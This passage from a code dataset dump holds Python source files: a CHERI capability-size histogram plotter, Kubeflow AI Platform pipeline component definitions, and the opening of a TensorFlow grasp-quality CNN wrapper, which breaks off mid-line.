\n","sub_path":"ports/esp32/modules/bma423.py","file_name":"bma423.py","file_ext":"py","file_size_in_byte":28406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"5726671","text":"#-\n# Copyright (c) 2017 Alfredo Mazzinghi\n# All rights reserved.\n#\n# This software was developed by SRI International and the University of\n# Cambridge Computer Laboratory under DARPA/AFRL contract FA8750-10-C-0237\n# (\"CTSRD\"), as part of the DARPA CRASH research programme.\n#\n# @BERI_LICENSE_HEADER_START@\n#\n# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor\n# license agreements. See the NOTICE file distributed with this work for\n# additional information regarding copyright ownership. BERI licenses this\n# file to you under the BERI Hardware-Software License, Version 1.0 (the\n# \"License\"); you may not use this file except in compliance with the\n# License. You may obtain a copy of the License at:\n#\n# http://www.beri-open-systems.org/legal/license-1-0.txt\n#\n# Unless required by applicable law or agreed to in writing, Work distributed\n# under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\n# CONDITIONS OF ANY KIND, either express or implied. 
See the License for the\n# specific language governing permissions and limitations under the License.\n#\n# @BERI_LICENSE_HEADER_END@\n#\n\nimport numpy as np\nimport pandas as pd\nimport logging\nimport os\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib import text\nfrom matplotlib import patches\n\nfrom cheriplot.utils import ProgressPrinter\nfrom cheriplot.core.addrspace_axes import Range\nfrom cheriplot.core.label_manager import LabelManager\nfrom cheriplot.core.vmmap import VMMap\nfrom cheriplot.plot.provenance.provenance_plot import PointerProvenancePlot\n\nlogger = logging.getLogger(__name__)\n\nclass CapSizeHistogramPlot(PointerProvenancePlot):\n \"\"\"\n Vertical bar plot showing a bar for each mapped region of\n memory in the executable.\n Each vertical bar is subdivided into bins showing the amount\n of capabilities of size X referencing something in that mapped region.\n The vertical bars have fixed height, representing 100% of the pointers\n in that region; the size of the bins is therefore the percentage of pointers\n to that region of size X.\n\n Variants:\n - remove roots, only keep globals (cfromptr)\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(CapSizeHistogramPlot, self).__init__(*args, **kwargs)\n\n self.vmmap = None\n \"\"\"VMMap object representing the process memory map.\"\"\"\n\n self.n_bins = [0, 10, 20, 21, 22, 23, 64]\n \"\"\"Bin edges for capability size, notice that the size is log2.\"\"\"\n\n self.norm_histogram = pd.DataFrame(columns=self.n_bins[1:])\n \"\"\"List of normalized histograms for each vmmap entry.\"\"\"\n\n self.abs_histogram = pd.DataFrame(columns=self.n_bins[1:])\n \"\"\"List of histograms for each vmmap entry.\"\"\"\n\n self.label_managers = []\n \"\"\"Manage vertical labels for each vertical column\"\"\"\n\n self.colormap = [plt.cm.Dark2(i) for i in\n np.linspace(0, 0.9, len(self.n_bins))]\n \"\"\"Set of colors to use.\"\"\"\n\n def init_axes(self):\n \"\"\"\n Build the figure and axes for the plot\n \"\"\"\n fig = plt.figure(figsize=(16,12))\n ax = fig.add_axes([0.05, 0.15, 0.9, 0.80,])\n return (fig, ax)\n\n def build_legend(self, handles):\n self.ax.legend(handles=handles, bbox_to_anchor=(0, 1.02, 1, 0.102),\n loc=3, ncol=9, mode=\"expand\", borderaxespad=0)\n\n def set_vmmap(self, mapfile):\n \"\"\"\n Use the CSV file for the memory mapping; later we will\n switch to a dynamic vmmap extracted from the trace.\n \"\"\"\n self.vmmap = VMMap(mapfile)\n\n def on_draw(self, evt):\n \"\"\"\n Adjust labels at the side of the bars so they do not overlap.\n \"\"\"\n for mgr in self.label_managers:\n mgr.update_label_position(evt.renderer)\n\n def plot(self):\n \"\"\"\n Make the vertical bar plot using the histogram data\n \"\"\"\n step = 2\n positions = range(1, step*self.norm_histogram.shape[0] + 1, step)\n # init label managers and legend list\n for row in range(self.norm_histogram.shape[0]):\n self.label_managers.append(LabelManager(direction=\"vertical\"))\n # self.label_managers[-1].constraint = (0, np.inf)\n\n legend_handles = []\n bin_start = 0\n # skip the first column that holds the vmmap entry for the row\n # labels have the form \"2^a-2^b\"\n for idx,bin_limit in enumerate(self.norm_histogram.columns):\n label = \"2^%d-2^%d\" % (bin_start, bin_limit)\n bin_start = bin_limit\n handle = patches.Patch(color=self.colormap[idx], label=label)\n legend_handles.append(handle)\n self.build_legend(legend_handles)\n\n self.ax.set_xticks(np.array(positions))\n ticklabels = []\n for entry in self.norm_histogram.index:\n if 
entry.path:\n label_name = os.path.basename(entry.path)\n else:\n label_name = \"0x%x\" % entry.start\n ticklabel = \"(%s) %s\" % (entry.perms, label_name)\n ticklabels.append(ticklabel)\n self.ax.set_xticklabels(ticklabels, rotation=\"vertical\")\n self.ax.set_yticks([0, 1])\n self.ax.set_yticklabels([\"0\", \"100\"])\n self.ax.set_xlim(0, positions[-1] + 1)\n self.ax.set_ylim(0, 1.1)\n self.ax.set_xlabel(\"Mapped memory region\")\n\n # build the bars in the plot\n bottom = np.zeros(self.norm_histogram.shape[0])\n for bin_idx, bin_limit in enumerate(self.norm_histogram.columns):\n color = self.colormap[bin_idx]\n bar_slices = self.ax.bar(positions, self.norm_histogram[bin_limit],\n bottom=bottom, color=color)\n bottom = bottom + self.norm_histogram[bin_limit]\n # create text labels\n for bar_idx,hist_idx in enumerate(self.norm_histogram.index):\n bar = bar_slices[bar_idx]\n abs_bin = self.abs_histogram.at[hist_idx, bin_limit]\n # write the absolute count at the left of each bar\n text_x = bar.get_x() - bar.get_width() / 2\n text_y = bar.get_y() + bar.get_height() / 2\n txt = self.ax.text(text_x, text_y, \" %d \" % abs_bin,\n ha=\"center\", va=\"center\",\n rotation=\"horizontal\")\n self.label_managers[bar_idx].labels.append(txt)\n\n self.fig.canvas.mpl_connect(\"draw_event\", self.on_draw)\n\n logger.debug(\"Plot build completed\")\n plt.savefig(self._get_plot_file())\n\n\nclass CapSizeCreationPlot(CapSizeHistogramPlot):\n \"\"\"\n Histogram plot that takes into account capabilities at creation time.\n The address space is split in chunks according to the VM map of the\n process. For each chunk, the set of capabilities that can be\n dereferenced in the chunk is computed. Note that the same capability may\n be counted in multiple chunks if it spans multiple VM map entries (eg DDC).\n From each set a histogram is generated and the bin count is used to produce\n the bar chart.\n \"\"\"\n\n def build_dataset(self):\n \"\"\"Process the provenance graph to extract histogram data.\"\"\"\n super(CapSizeCreationPlot, self).build_dataset()\n\n # indexes in the vmmap and in the norm_histograms are\n # the same.\n vm_entries = list(self.vmmap)\n vm_ranges = [Range(v.start, v.end) for v in self.vmmap]\n hist_data = [[] for _ in range(len(vm_entries))]\n\n progress = ProgressPrinter(self.dataset.num_vertices(),\n desc=\"Sorting capability references\")\n logger.debug(\"Vm ranges %s\", vm_ranges)\n for node in self.dataset.vertices():\n data = self.dataset.vp.data[node]\n for idx, r in enumerate(vm_ranges):\n if Range(data.cap.base, data.cap.bound) in r:\n hist_data[idx].append(data.cap.length)\n progress.advance()\n progress.finish()\n\n for vm_entry,data in zip(vm_entries, hist_data):\n logger.debug(\"hist entry len %d\", len(data))\n if len(data) == 0:\n continue\n # the bin size is logarithmic\n data = np.log2(data)\n h, b = np.histogram(data, bins=self.n_bins)\n # append histograms to the dataframe\n # self.hist_sources.append(vm_entry)\n # new_index = len(self.abs_histogram.index)\n self.abs_histogram.loc[vm_entry] = h\n self.norm_histogram.loc[vm_entry] = h / np.sum(h)\n\n def plot(self):\n self.ax.set_ylabel(\"Percentage of dereferenceable capabilities by size\")\n return super().plot()\n\n\nclass CapSizeDerefPlot(CapSizeHistogramPlot):\n \"\"\"\n Histogram plot that takes into account capabilities at dereference time.\n The address space is split in the same way as in\n :class:`CapSizeCreationPlot` but each capability is assigned to\n a memory-mapped region based on its offset when 
it is dereferenced.\n Note that there is an amount of overcounting due to locations that\n are heavily accessed.\n \"\"\"\n\n def build_dataset(self):\n \"\"\"Process the provenance graph to extract histogram data.\"\"\"\n super(CapSizeDerefPlot, self).build_dataset()\n\n # indexes in the vmmap and in the norm_histograms are\n # the same.\n vm_entries = list(self.vmmap)\n vm_ranges = [Range(v.start, v.end) for v in self.vmmap]\n hist_data = [[] for _ in range(len(vm_ranges))]\n\n progress = ProgressPrinter(self.dataset.num_vertices(),\n desc=\"Sorting capability references\")\n for node in self.dataset.vertices():\n data = self.dataset.vp.data[node]\n # iterate over every dereference of the node\n for addr in data.deref[\"addr\"]:\n # check in which vm-entry the address is\n for idx, r in enumerate(vm_ranges):\n if addr in r:\n hist_data[idx].append(data.cap.length)\n break\n progress.advance()\n progress.finish()\n\n for vm_entry,data in zip(vm_entries, hist_data):\n if len(data) == 0:\n continue\n # the bin size is logarithmic\n data = np.log2(data)\n h, b = np.histogram(data, bins=self.n_bins)\n # append histogram to the dataframes\n # self.hist_sources.append(vm_entry)\n # new_index = len(self.abs_histogram.index)\n self.abs_histogram.loc[vm_entry] = h\n self.norm_histogram.loc[vm_entry] = h / np.sum(h)\n\n def plot(self):\n self.ax.set_ylabel(\"Percentage of dereferenced capabilities by size\")\n return super().plot()\n","sub_path":"cheriplot/plot/provenance/cap_size.py","file_name":"cap_size.py","file_ext":"py","file_size_in_byte":10871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"58447360","text":"# Copyright 2021 The Kubeflow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Core modules for AI Platform Pipeline Components.\"\"\"\n\nimport os\nfrom google.cloud import aiplatform as aiplatform_sdk\nfrom google_cloud_pipeline_components.aiplatform import utils\nfrom kfp import components\n\n\n__all__ = [\n 'ImageDatasetCreateOp',\n 'TabularDatasetCreateOp',\n 'TextDatasetCreateOp',\n 'VideoDatasetCreateOp',\n 'ImageDatasetExportDataOp',\n 'TabularDatasetExportDataOp',\n 'TextDatasetExportDataOp',\n 'VideoDatasetExportDataOp',\n 'ImageDatasetImportDataOp',\n 'TextDatasetImportDataOp',\n 'VideoDatasetImportDataOp',\n 'CustomContainerTrainingJobRunOp',\n 'CustomPythonPackageTrainingJobRunOp',\n 'AutoMLImageTrainingJobRunOp',\n 'AutoMLTextTrainingJobRunOp',\n 'AutoMLTabularTrainingJobRunOp',\n 'AutoMLVideoTrainingJobRunOp',\n 'ModelDeployOp',\n 'ModelBatchPredictOp',\n \"ModelExportOp\",\n 'ModelUploadOp',\n 'EndpointCreateOp',\n 'TimeSeriesDatasetCreateOp',\n 'TimeSeriesDatasetExportDataOp',\n 'AutoMLForecastingTrainingJobRunOp',\n]\n\nTimeSeriesDatasetCreateOp = utils.convert_method_to_component(\n aiplatform_sdk.TimeSeriesDataset, aiplatform_sdk.TimeSeriesDataset.create\n)\n\nImageDatasetCreateOp = utils.convert_method_to_component(\n aiplatform_sdk.ImageDataset, 
aiplatform_sdk.ImageDataset.create\n)\n\nTabularDatasetCreateOp = utils.convert_method_to_component(\n aiplatform_sdk.TabularDataset, aiplatform_sdk.TabularDataset.create\n)\n\nTextDatasetCreateOp = utils.convert_method_to_component(\n aiplatform_sdk.TextDataset, aiplatform_sdk.TextDataset.create\n)\n\nVideoDatasetCreateOp = utils.convert_method_to_component(\n aiplatform_sdk.VideoDataset, aiplatform_sdk.VideoDataset.create\n)\n\nImageDatasetExportDataOp = utils.convert_method_to_component(\n aiplatform_sdk.ImageDataset,\n aiplatform_sdk.ImageDataset.export_data,\n)\n\nTabularDatasetExportDataOp = utils.convert_method_to_component(\n aiplatform_sdk.TabularDataset,\n aiplatform_sdk.TabularDataset.export_data,\n)\n\nTimeSeriesDatasetExportDataOp = utils.convert_method_to_component(\n aiplatform_sdk.TimeSeriesDataset,\n aiplatform_sdk.TimeSeriesDataset.export_data,\n)\n\nTextDatasetExportDataOp = utils.convert_method_to_component(\n aiplatform_sdk.TextDataset,\n aiplatform_sdk.TextDataset.export_data,\n)\n\nVideoDatasetExportDataOp = utils.convert_method_to_component(\n aiplatform_sdk.VideoDataset,\n aiplatform_sdk.VideoDataset.export_data,\n)\n\nImageDatasetImportDataOp = utils.convert_method_to_component(\n aiplatform_sdk.ImageDataset,\n aiplatform_sdk.ImageDataset.import_data,\n)\n\nTextDatasetImportDataOp = utils.convert_method_to_component(\n aiplatform_sdk.TextDataset,\n aiplatform_sdk.TextDataset.import_data,\n)\n\nVideoDatasetImportDataOp = utils.convert_method_to_component(\n aiplatform_sdk.VideoDataset,\n aiplatform_sdk.VideoDataset.import_data,\n)\n\nCustomContainerTrainingJobRunOp = utils.convert_method_to_component(\n aiplatform_sdk.CustomContainerTrainingJob,\n aiplatform_sdk.CustomContainerTrainingJob.run,\n)\n\nCustomPythonPackageTrainingJobRunOp = utils.convert_method_to_component(\n aiplatform_sdk.CustomPythonPackageTrainingJob,\n aiplatform_sdk.CustomPythonPackageTrainingJob.run,\n)\n\nAutoMLImageTrainingJobRunOp = utils.convert_method_to_component(\n aiplatform_sdk.AutoMLImageTrainingJob,\n aiplatform_sdk.AutoMLImageTrainingJob.run,\n)\n\nAutoMLTextTrainingJobRunOp = utils.convert_method_to_component(\n aiplatform_sdk.AutoMLTextTrainingJob,\n aiplatform_sdk.AutoMLTextTrainingJob.run,\n)\n\nAutoMLTabularTrainingJobRunOp = utils.convert_method_to_component(\n aiplatform_sdk.AutoMLTabularTrainingJob,\n aiplatform_sdk.AutoMLTabularTrainingJob.run,\n)\n\nAutoMLForecastingTrainingJobRunOp = utils.convert_method_to_component(\n aiplatform_sdk.AutoMLForecastingTrainingJob,\n aiplatform_sdk.AutoMLForecastingTrainingJob.run,\n)\n\nAutoMLVideoTrainingJobRunOp = utils.convert_method_to_component(\n aiplatform_sdk.AutoMLVideoTrainingJob,\n aiplatform_sdk.AutoMLVideoTrainingJob.run,\n)\n\nModelExportOp = components.load_component_from_file(\n os.path.join(\n os.path.dirname(__file__), 'model/export_model/component.yaml'))\n\nModelDeployOp = components.load_component_from_file(\n os.path.join(\n os.path.dirname(__file__), 'endpoint/deploy_model/component.yaml'))\n\nModelBatchPredictOp = components.load_component_from_file(\n os.path.join(os.path.dirname(__file__), 'batch_predict_job/component.yaml'))\n\nModelUploadOp = components.load_component_from_file(\n os.path.join(\n os.path.dirname(__file__), 'model/upload_model/component.yaml'))\n\nEndpointCreateOp = components.load_component_from_file(\n os.path.join(\n os.path.dirname(__file__), 
'endpoint/create_endpoint/component.yaml'))\n","sub_path":"components/google-cloud/google_cloud_pipeline_components/aiplatform/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"122563266","text":"\"\"\"\nQuick wrapper for grasp quality neural network\nAuthor: Jeff Mahler\n\"\"\"\n\nimport copy\nimport json\nimport logging\nimport numpy as np\nimport os\nimport sys\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nfrom autolab_core import YamlConfig\n\nimport optimizer_constants\nfrom optimizer_constants import InputDataMode\nfrom functools import reduce # a builtin on Python 2; imported so reduce_shape also runs on Python 3\n\n\ndef reduce_shape(shape):\n \"\"\" Get shape of a layer for flattening \"\"\"\n shape = [x.value for x in shape[1:]]\n f = lambda x, y: 1 if y is None else x * y\n return reduce(f, shape, 1)\n\n\nclass GQCnnWeights(object):\n \"\"\" Struct helper for storing weights \"\"\"\n\n def __init__(self):\n pass\n\n\nclass GQCnnDenoisingWeights(object):\n \"\"\" Struct helper for storing weights \"\"\"\n\n def __init__(self):\n pass\n\n\nclass GQCNN(object):\n \"\"\" Wrapper for grasp quality CNN \"\"\"\n\n def __init__(self, config):\n \"\"\"\n Parameters\n ----------\n config :obj: dict\n python dictionary of configuration parameters such as architecture and basic data params such as batch_size for prediction,\n im_height, im_width, ...\n \"\"\"\n self._sess = None\n self._graph = tf.Graph()\n self._parse_config(config)\n\n @staticmethod\n def load(model_dir):\n \"\"\" Instantiates a GQCNN object using the model found in model_dir \n\n Parameters\n ----------\n model_dir :obj: str\n path to model directory where weights and architecture are stored\n\n Returns\n -------\n :obj:`GQCNN`\n GQCNN object initialized with the weights and architecture found in the specified model directory\n \"\"\"\n # get config dict with architecture and other basic configurations for GQCNN from config.json in model directory\n config_file = os.path.join(model_dir, 'config.json')\n with open(config_file) as data_file: \n train_config = json.load(data_file)\n\n gqcnn_config = train_config['gqcnn_config']\n\n # create GQCNN object and initialize weights and network\n gqcnn = GQCNN(gqcnn_config)\n gqcnn.init_weights_file(os.path.join(model_dir, 'model.ckpt'))\n gqcnn.initialize_network()\n gqcnn.init_mean_and_std(model_dir)\n\n return gqcnn\n\n def get_tf_graph(self):\n \"\"\" Returns the graph for this tf session \n\n Returns\n -------\n :obj:`tf Graph`\n TensorFlow Graph \n \"\"\"\n return self._graph\n\n def get_weights(self):\n \"\"\" Returns the weights for this network \n\n Returns\n -------\n :obj:`GQCnnWeights`\n network weights\n \"\"\"\n return self._weights\n\n def init_mean_and_std(self, model_dir):\n \"\"\" Initializes the mean and std to use for data normalization during prediction \n\n Parameters\n ----------\n model_dir :obj: str\n path to model directory where means and standard deviations are stored\n \"\"\"\n # load in means and stds for all 7 possible pose variables\n # grasp center row, grasp center col, gripper depth, grasp theta, crop center row, crop center col, grip width\n self._im_mean = np.load(os.path.join(model_dir, 'mean.npy'))\n self._im_std = np.load(os.path.join(model_dir, 'std.npy'))\n self._pose_mean = np.load(os.path.join(model_dir, 'pose_mean.npy'))\n self._pose_std = np.load(os.path.join(model_dir, 'pose_std.npy'))\n\n # slice out the variables we want based on the input pose_dim, which\n # is dependent on the input data 
mode used to train the model\n if self._input_data_mode == InputDataMode.TF_IMAGE:\n # depth\n self._pose_mean = self._pose_mean[2]\n self._pose_std = self._pose_std[2]\n elif self._input_data_mode == InputDataMode.TF_IMAGE_PERSPECTIVE:\n # depth, cx, cy\n self._pose_mean = np.concatenate([self._pose_mean[2:3], self._pose_mean[4:6]])\n self._pose_std = np.concatenate([self._pose_std[2:3], self._pose_std[4:6]])\n elif self._input_data_mode == InputDataMode.RAW_IMAGE:\n # u, v, depth, theta\n self._pose_mean = self._pose_mean[:4]\n self._pose_std = self._pose_std[:4]\n elif self._input_data_mode == InputDataMode.RAW_IMAGE_PERSPECTIVE:\n # u, v, depth, theta, cx, cy\n self._pose_mean = self._pose_mean[:6]\n self._pose_std = self._pose_std[:6]\n\n def init_weights_file(self, model_filename):\n \"\"\" Initialize network weights from the specified model \n\n Parameters\n ----------\n model_filename :obj: str\n path to model to be loaded into weights\n \"\"\"\n\n # load the checkpoint into this graph\n with self._graph.as_default():\n\n # open a reader on the checkpoint\n reader = tf.train.NewCheckpointReader(model_filename)\n\n # create empty weight object\n self._weights = GQCnnWeights()\n\n # read in conv1 & conv2\n self._weights.conv1_1W = tf.Variable(reader.get_tensor(\"conv1_1W\"))\n self._weights.conv1_1b = tf.Variable(reader.get_tensor(\"conv1_1b\"))\n self._weights.conv1_2W = tf.Variable(reader.get_tensor(\"conv1_2W\"))\n self._weights.conv1_2b = tf.Variable(reader.get_tensor(\"conv1_2b\"))\n self._weights.conv2_1W = tf.Variable(reader.get_tensor(\"conv2_1W\"))\n self._weights.conv2_1b = tf.Variable(reader.get_tensor(\"conv2_1b\"))\n self._weights.conv2_2W = tf.Variable(reader.get_tensor(\"conv2_2W\"))\n self._weights.conv2_2b = tf.Variable(reader.get_tensor(\"conv2_2b\"))\n\n # if conv3 is to be used, read in conv3\n if self._use_conv3:\n self._weights.conv3_1W = tf.Variable(reader.get_tensor(\"conv3_1W\"))\n self._weights.conv3_1b = tf.Variable(reader.get_tensor(\"conv3_1b\"))\n self._weights.conv3_2W = tf.Variable(reader.get_tensor(\"conv3_2W\"))\n self._weights.conv3_2b = tf.Variable(reader.get_tensor(\"conv3_2b\"))\n\n # read in pc1\n self._weights.pc1W = tf.Variable(reader.get_tensor(\"pc1W\"))\n self._weights.pc1b = tf.Variable(reader.get_tensor(\"pc1b\"))\n\n # if pc2 is to be used, read in pc2\n if self._use_pc2:\n self._weights.pc2W = tf.Variable(reader.get_tensor(\"pc2W\"))\n self._weights.pc2b = tf.Variable(reader.get_tensor(\"pc2b\"))\n\n self._weights.fc3W = tf.Variable(reader.get_tensor(\"fc3W\"))\n self._weights.fc3b = tf.Variable(reader.get_tensor(\"fc3b\"))\n self._weights.fc4W_im = tf.Variable(reader.get_tensor(\"fc4W_im\"))\n self._weights.fc4W_pose = tf.Variable(reader.get_tensor(\"fc4W_pose\"))\n self._weights.fc4b = tf.Variable(reader.get_tensor(\"fc4b\"))\n self._weights.fc5W = tf.Variable(reader.get_tensor(\"fc5W\"))\n self._weights.fc5b = tf.Variable(reader.get_tensor(\"fc5b\"))\n\n def reinitialize_layers(self, reinit_fc3, reinit_fc4, reinit_fc5, reinit_pc1=False):\n \"\"\" Re-initializes final fully-connected layers for fine-tuning \n\n Parameters\n ----------\n reinit_fc3 : bool\n whether to re-initialize fc3\n reinit_fc4 : bool\n whether to re-initialize fc4\n reinit_fc5 : bool\n whether to re-initialize fc5\n reinit_pc1 : bool\n whether to re-initialize pc1\n \"\"\"\n with self._graph.as_default():\n if reinit_pc1:\n pc1_std = np.sqrt(2.0 / self.pc1_in_size)\n self._weights.pc1W = tf.Variable(tf.truncated_normal([self.pc1_in_size, self.pc1_out_size],\n stddev=pc1_std), name='pc1W')\n 
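# (the stddev above follows He initialization, std = sqrt(2 / fan_in), matching init_weights_gaussian below)\n 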
self._weights.pc1b = tf.Variable(tf.truncated_normal([self.pc1_out_size],\n stddev=pc1_std), name='pc1b')\n\n if reinit_fc3:\n fc3_std = np.sqrt(2.0 / (self.fc3_in_size))\n self._weights.fc3W = tf.Variable(tf.truncated_normal([self.fc3_in_size, self.fc3_out_size], stddev=fc3_std))\n self._weights.fc3b = tf.Variable(tf.truncated_normal([self.fc3_out_size], stddev=fc3_std)) \n if reinit_fc4:\n fc4_std = np.sqrt(2.0 / (self.fc4_in_size))\n self._weights.fc4W_im = tf.Variable(tf.truncated_normal([self.fc4_in_size, self.fc4_out_size], stddev=fc4_std))\n self._weights.fc4W_pose = tf.Variable(tf.truncated_normal([self.fc4_pose_in_size, self.fc4_out_size], stddev=fc4_std))\n self._weights.fc4b = tf.Variable(tf.truncated_normal([self.fc4_out_size], stddev=fc4_std))\n if reinit_fc5:\n fc5_std = np.sqrt(2.0 / (self.fc5_in_size))\n self._weights.fc5W = tf.Variable(tf.truncated_normal([self.fc5_in_size, self.fc5_out_size], stddev=fc5_std))\n self._weights.fc5b = tf.Variable(tf.constant(0.0, shape=[self.fc5_out_size]))\n \n def init_weights_gaussian(self):\n \"\"\" Initializes weights for network from scratch using Gaussian Distribution \"\"\"\n\n # init pool size variables\n cfg = self._architecture\n layer_height = self._im_height\n layer_width = self._im_width\n layer_channels = self._num_channels\n\n # conv1_1\n conv1_1_filt_dim = cfg['conv1_1']['filt_dim']\n conv1_1_num_filt = cfg['conv1_1']['num_filt']\n conv1_1_size = layer_height * layer_width * conv1_1_num_filt\n conv1_1_shape = [conv1_1_filt_dim, conv1_1_filt_dim, layer_channels, conv1_1_num_filt]\n\n conv1_1_num_inputs = conv1_1_filt_dim**2 * layer_channels\n conv1_1_std = np.sqrt(2.0 / (conv1_1_num_inputs))\n conv1_1W = tf.Variable(tf.truncated_normal(conv1_1_shape, stddev=conv1_1_std), name='conv1_1W')\n conv1_1b = tf.Variable(tf.truncated_normal([conv1_1_num_filt], stddev=conv1_1_std), name='conv1_1b')\n\n layer_height = layer_height / cfg['conv1_1']['pool_stride']\n layer_width = layer_width / cfg['conv1_1']['pool_stride']\n layer_channels = conv1_1_num_filt\n\n # conv1_2\n conv1_2_filt_dim = cfg['conv1_2']['filt_dim']\n conv1_2_num_filt = cfg['conv1_2']['num_filt']\n conv1_2_size = layer_height * layer_width * conv1_2_num_filt\n conv1_2_shape = [conv1_2_filt_dim, conv1_2_filt_dim, layer_channels, conv1_2_num_filt]\n\n conv1_2_num_inputs = conv1_2_filt_dim**2 * layer_channels\n conv1_2_std = np.sqrt(2.0 / (conv1_2_num_inputs))\n conv1_2W = tf.Variable(tf.truncated_normal(conv1_2_shape, stddev=conv1_2_std), name='conv1_2W')\n conv1_2b = tf.Variable(tf.truncated_normal([conv1_2_num_filt], stddev=conv1_2_std), name='conv1_2b')\n\n layer_height = layer_height / cfg['conv1_2']['pool_stride']\n layer_width = layer_width / cfg['conv1_2']['pool_stride']\n layer_channels = conv1_2_num_filt\n\n # conv2_1\n conv2_1_filt_dim = cfg['conv2_1']['filt_dim']\n conv2_1_num_filt = cfg['conv2_1']['num_filt']\n conv2_1_size = layer_height * layer_width * conv2_1_num_filt\n conv2_1_shape = [conv2_1_filt_dim, conv2_1_filt_dim, layer_channels, conv2_1_num_filt]\n\n conv2_1_num_inputs = conv2_1_filt_dim**2 * layer_channels\n conv2_1_std = np.sqrt(2.0 / (conv2_1_num_inputs))\n conv2_1W = tf.Variable(tf.truncated_normal(conv2_1_shape, stddev=conv2_1_std), name='conv2_1W')\n conv2_1b = tf.Variable(tf.truncated_normal([conv2_1_num_filt], stddev=conv2_1_std), name='conv2_1b')\n\n layer_height = layer_height / cfg['conv2_1']['pool_stride']\n layer_width = layer_width / cfg['conv2_1']['pool_stride']\n layer_channels = conv2_1_num_filt\n\n # conv2_2\n conv2_2_filt_dim = 
cfg['conv2_2']['filt_dim']\n conv2_2_num_filt = cfg['conv2_2']['num_filt']\n conv2_2_size = layer_height * layer_width * conv2_2_num_filt\n conv2_2_shape = [conv2_2_filt_dim, conv2_2_filt_dim, layer_channels, conv2_2_num_filt]\n\n conv2_2_num_inputs = conv2_2_filt_dim**2 * layer_channels\n conv2_2_std = np.sqrt(2.0 / (conv2_2_num_inputs))\n conv2_2W = tf.Variable(tf.truncated_normal(conv2_2_shape, stddev=conv2_2_std), name='conv2_2W')\n conv2_2b = tf.Variable(tf.truncated_normal([conv2_2_num_filt], stddev=conv2_2_std), name='conv2_2b')\n\n layer_height = layer_height / cfg['conv2_2']['pool_stride']\n layer_width = layer_width / cfg['conv2_2']['pool_stride']\n layer_channels = conv2_2_num_filt\n\n use_conv3 = False\n if 'conv3_1' in cfg.keys():\n use_conv3 = True\n\n if use_conv3:\n # conv3_1\n conv3_1_filt_dim = cfg['conv3_1']['filt_dim']\n conv3_1_num_filt = cfg['conv3_1']['num_filt']\n conv3_1_size = layer_height * layer_width * conv3_1_num_filt\n conv3_1_shape = [conv3_1_filt_dim, conv3_1_filt_dim, layer_channels, conv3_1_num_filt]\n \n conv3_1_num_inputs = conv3_1_filt_dim**2 * layer_channels\n conv3_1_std = np.sqrt(2.0 / (conv3_1_num_inputs))\n conv3_1W = tf.Variable(tf.truncated_normal(conv3_1_shape, stddev=conv3_1_std), name='conv3_1W')\n conv3_1b = tf.Variable(tf.truncated_normal([conv3_1_num_filt], stddev=conv3_1_std), name='conv3_1b')\n \n layer_height = layer_height / cfg['conv3_1']['pool_stride']\n layer_width = layer_width / cfg['conv3_1']['pool_stride']\n layer_channels = conv3_1_num_filt\n\n # conv3_2\n conv3_2_filt_dim = cfg['conv3_2']['filt_dim']\n conv3_2_num_filt = cfg['conv3_2']['num_filt']\n conv3_2_size = layer_height * layer_width * conv3_2_num_filt\n conv3_2_shape = [conv3_2_filt_dim, conv3_2_filt_dim, layer_channels, conv3_2_num_filt]\n \n conv3_2_num_inputs = conv3_2_filt_dim**2 * layer_channels\n conv3_2_std = np.sqrt(2.0 / (conv3_2_num_inputs))\n conv3_2W = tf.Variable(tf.truncated_normal(conv3_2_shape, stddev=conv3_2_std), name='conv3_2W')\n conv3_2b = tf.Variable(tf.truncated_normal([conv3_2_num_filt], stddev=conv3_2_std), name='conv3_2b')\n \n layer_height = layer_height / cfg['conv3_2']['pool_stride']\n layer_width = layer_width / cfg['conv3_2']['pool_stride']\n layer_channels = conv3_2_num_filt\n\n # fc3\n fc3_in_size = conv2_2_size\n if use_conv3:\n fc3_in_size = conv3_2_size\n fc3_out_size = cfg['fc3']['out_size']\n fc3_std = np.sqrt(2.0 / fc3_in_size)\n fc3W = tf.Variable(tf.truncated_normal([fc3_in_size, fc3_out_size], stddev=fc3_std), name='fc3W')\n fc3b = tf.Variable(tf.truncated_normal([fc3_out_size], stddev=fc3_std), name='fc3b')\n\n # pc1\n pc1_in_size = self._pose_dim\n pc1_out_size = cfg['pc1']['out_size']\n\n pc1_std = np.sqrt(2.0 / pc1_in_size)\n pc1W = tf.Variable(tf.truncated_normal([pc1_in_size, pc1_out_size],\n stddev=pc1_std), name='pc1W')\n pc1b = tf.Variable(tf.truncated_normal([pc1_out_size],\n stddev=pc1_std), name='pc1b')\n\n # pc2\n pc2_in_size = pc1_out_size\n pc2_out_size = cfg['pc2']['out_size']\n\n if pc2_out_size > 0:\n pc2_std = np.sqrt(2.0 / pc2_in_size)\n pc2W = tf.Variable(tf.truncated_normal([pc2_in_size, pc2_out_size],\n stddev=pc2_std), name='pc2W')\n pc2b = tf.Variable(tf.truncated_normal([pc2_out_size],\n stddev=pc2_std), name='pc2b')\n\n # fc4\n fc4_im_in_size = fc3_out_size\n if pc2_out_size == 0:\n fc4_pose_in_size = pc1_out_size\n else:\n fc4_pose_in_size = pc2_out_size\n fc4_out_size = cfg['fc4']['out_size']\n fc4_std = np.sqrt(2.0 / (fc4_im_in_size + fc4_pose_in_size))\n fc4W_im = 
